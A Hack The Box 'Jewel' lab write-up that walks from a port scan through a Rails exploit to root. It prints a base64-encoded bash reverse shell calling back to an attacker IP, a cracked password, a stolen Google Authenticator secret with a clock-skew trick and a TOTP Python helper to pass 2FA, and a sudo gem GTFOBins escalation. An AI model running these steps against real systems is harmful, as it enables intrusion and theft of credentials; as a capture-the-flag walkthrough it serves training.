User
[jusepe@nix:~/Documents/HackTheBox/Jewel]$ sudo scan jewel.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,8000,8080
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL: 0
Furious: 133
Nmap: 14
Total: 147
Port 8000 hosts GitWeb, so checked the exposed repository for version information.
Found the Ruby on Rails version in use, which is vulnerable.
Found this PoC on GitHub and got a shell with it (the base64 argument decodes to a bash reverse shell back to 10.10.15.193:8181):
[jusepe@nix:~/Documents/HackTheBox/Jewel]$ python3 exploit.py jewel.htb 8080 fredy@user.com 1234 "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODE4MSAwPiYxCg== | base64 -d | bash"
Root
Executed LinPEAS to enumerate the system and got some password hashes from the SQL database:
Cracked one of the hashes; the password was spongebob. Tried it with sudo and it worked, but a verification code is requested as well:
(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill:
Verification code:
My pet ferret can type better than you!
Found the Google Authenticator secret file inside the home folder:
(remote) bill@jewel.htb:/home/bill$ ls -la
total 52
drwxr-xr-x 6 bill bill 4096 Jan 20 08:33 .
drwxr-xr-x 3 root root 4096 Aug 26 09:32 ..
lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .bash_history -> /dev/null
-rw-r--r-- 1 bill bill 220 Aug 26 09:32 .bash_logout
-rw-r--r-- 1 bill bill 3526 Aug 26 09:32 .bashrc
drwxr-xr-x 15 bill bill 4096 Sep 17 17:16 blog
drwxr-xr-x 3 bill bill 4096 Aug 26 10:33 .gem
-rw-r--r-- 1 bill bill 43 Aug 27 10:53 .gitconfig
drwx------ 3 bill bill 4096 Jan 20 08:15 .gnupg
-r-------- 1 bill bill 56 Aug 28 07:00 .google_authenticator
drwxr-xr-x 3 bill bill 4096 Aug 27 10:54 .local
-rw-r--r-- 1 bill bill 807 Aug 26 09:32 .profile
lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .rediscli_history -> /dev/null
-r-------- 1 bill bill 33 Jan 20 05:12 user.txt
-rw-r--r-- 1 bill bill 116 Aug 26 10:43 .yarnrc
(remote) bill@jewel.htb:/home/bill$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
Downloaded a browser extension that generates TOTP codes from the secret just taken from .google_authenticator.
However, when entering the 2FA code, got an unexpected error message:
(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill:
Verification code:
Error "Operation not permitted" while writing config
stty: unknown mode: doofus
After some research found this comment suggesting that the clocks of the two hosts didn't match (the stty line is just one of sudo's insults, enabled by the insults option in the sudoers defaults shown later), so got the current date from the target:
(remote) bill@jewel.htb:/home/bill$ date +%s
1611143531
Then set that same date on my own host so the generated codes fall into the target's time window:
[jusepe@nix:~/Documents/HackTheBox/Jewel]$ sudo date +%s -s @1611143531
1611143531
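To see why the clock matters, here is an added example (not part of the original writeup) that computes codes the way Google Authenticator does (RFC 6238 TOTP: HMAC-SHA1 over a 30-second counter, 6 digits) from a base32 secret like the one in .google_authenticator, and checks a submitted code against a window of accepted steps. The verify() function, its window_size parameter, and the interpretation of WINDOW_SIZE 17 as eight steps of skew on either side are my assumptions about the PAM module's behaviour; the RFC 4226/6238 test vectors are used to confirm the arithmetic.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def decode_secret(base32_secret: str) -> bytes:
    """Decode the unpadded base32 secret found on the first line of .google_authenticator."""
    s = base32_secret.strip().upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def totp(base32_secret: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    return hotp(decode_secret(base32_secret), unix_time // step, digits)


def verify(base32_secret: str, code: str, unix_time: int,
           window_size: int = 17, step: int = 30) -> bool:
    """Accept a code if it matches any of window_size consecutive steps centred on the
    server's current step. Assumption: this mirrors WINDOW_SIZE in .google_authenticator,
    so 17 codes means up to 8 steps (4 minutes) of clock skew in either direction."""
    half = window_size // 2
    key = decode_secret(base32_secret)
    now = unix_time // step
    return any(hmac.compare_digest(hotp(key, now + d), code) for d in range(-half, half + 1))


TARGET_SECRET = "2UQI3R52WFCLE6JTLDCSJYMJH4"  # secret from the writeup's .google_authenticator
TARGET_TIME = 1611143531                      # output of `date +%s` on the target

if __name__ == "__main__":
    code = totp(TARGET_SECRET, TARGET_TIME)
    print(f"code for target time {TARGET_TIME}: {code}")
    print("accepted when the clocks match:  ", verify(TARGET_SECRET, code, TARGET_TIME))
    # A local clock one hour off is 120 steps away, far outside the 17-code window.
    print("accepted with the clock 1h off:  ", verify(TARGET_SECRET, code, TARGET_TIME + 3600))
    now = int(time.time())
    print("code for the local clock right now:", totp(TARGET_SECRET, now))
```

Run it and compare the first printed code with what the browser extension shows while the local clock is still skewed: the extension computes the same function from the local time, so its code only matches when the two clocks fall into the same window.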
Now sudo works just fine:
(remote) bill@jewel.htb:/home/bill$ sudo -l
[sudo] password for bill:
Verification code:
Matching Defaults entries for bill on jewel:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, insults
User bill may run the following commands on jewel:
(ALL : ALL) /usr/bin/gem
We can run gem as root, so we can escalate privileges following GTFOBins (gem open -e runs the given editor command, here a shell, on the gem's source directory):
(remote) bill@jewel.htb:/home/bill$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
(remote) root@jewel.htb:/home/bill$:/usr/lib/ruby/gems/2.5.0/gems/rdoc-6.0.1$ id
uid=0(root) gid=0(root) groups=0(root)